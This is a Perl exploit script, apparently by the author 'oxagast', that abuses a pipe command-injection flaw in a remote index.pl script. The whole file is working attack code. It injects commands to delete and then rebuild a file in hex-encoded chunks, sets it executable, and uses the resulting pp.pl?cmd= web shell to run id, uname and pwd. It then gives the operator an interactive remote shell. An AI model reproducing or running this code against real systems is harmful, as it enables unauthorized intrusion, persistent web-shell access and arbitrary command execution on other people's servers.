#!/usr/bin/perl

#oxagast
#                                                          
#   __ _  _  __   ___  __  ____ ____                       
#  /  ( \/ )/ _\ / __)/ _\/ ___(_  _)                     
# (  O )  (/    ( (_ /    \___ \ )(                       
#  \__(_/\_\_/\_/\___\_/\_(____/(__)                      
#                                                        

use LWP::Simple;								# Loads the downloading module from LWP
use List::MoreUtils qw(natatime);						# Loads the n at a time module from List MoreUtils
$part1 = @ARGV[0];$part2 = @ARGV[1];		# Sucks up all the arguments
$lfn = "./pp.pl";
$rfn = "pp.pl";
$baseurl = $part1;
$baseurl =~ s/index.pl.*//;							# get baseurl
$stuff = get("$part1\|rm -f $rfn\|$part2");					# Uses the pipe bug to remove the file if it's there so we can put new data in
$buff = "";									# Initializes buffer
$string = "";									# Initializes string where buffer will put into
open FILEHANDLE, "<", $lfn;							# Open the local file handle for reading
binmode FILEHANDLE;								# Make sure we open in binary mode
while(read (FILEHANDLE, $buff, 1)) {						# Until the files over we read 1 character at a time into buffer and open loop
	$file .= $buff;								# Stick it together into the string variable
}										# Close loop
close FILEHANDLE;								# Close the file because we are done reading it
$unpacked = unpack("H*","$file");						# Turns the file contense into a hexadecimal string
$ib = " ";									# ib is a space, just for a placeholder
$unpacked =~ s/(..)/$ib$1/g;							# Globally  search and replace putting a space between the hex
$howmuch = 256;									# How many chars to try to send at once
@hexxy = split(" ", $unpacked);							# Split with the space between the hex codes to put each hexadecimal code 
										# into the list
$it = natatime $howmuch, @hexxy;						# Initialize n at a time, making the itterator put howmuch chars (in hex) 
										# into the new buffer at a time
while( my @hex = $it->()) {							# Start the itterator and put it in the array called hex
	for $hexer (0..scalar(@hex)-1) {					# For the itterator we have hexer as the count of 0 through 1 before the end of the hex list
		@hex[$hexer] =~ s/(..)/\\\\x$1/;				# put two backslashes and an x before the hex
		$hexstring = join "", @hex;					# Put however many howmany hex codes in the string in the above format for echo
		if ($hexstring =~ m/\\x..$/g) {					# Since there is other crap in there, we have to get the last string in that 
										# itteration that's in the right format at the end of the line
#			print "$hexstring";					# Print the hex codes it sent
			get("$part1\|echo -n -e $hexstring >> $rfn\|$part2");	# Use a long get request, part1 being everything before where we would normally put 
										# a pipe for command execution, then the echo command telling it no new lines and to 
										# use hexadecimal, finally the last part of the address is put in, and it sends the 
										# get request, and in doing so, echos in all our hex data
		}								# Closes loop
	}									# Closes loop
}										# closes itterator
get("$part1|chmod 0711 ./pp.pl|$part2");					# Change perms
$idstr = get($baseurl . "pp.pl?cmd=id");					# id
$unstr = get($baseurl . "pp.pl?cmd=uname -a");					# uname
$cwd = get($baseurl . "pp.pl?cmd=pwd");						# get current dir
chomp($idstr);									# cut some stuff off the ends
chomp($unstr);
print $idstr . $unstr;								#print id and uname -a
chomp($cwd);
chomp($cwd);
while($comm = <STDIN>) {							# get input
  print "$cwd \$ ";								# fake $PS1
  chomp($comm);
  $content = get($baseurl . "pp.pl?cmd=" . $comm);				# get output
  chomp($content);
  print $content;								# print it
}										# got shells?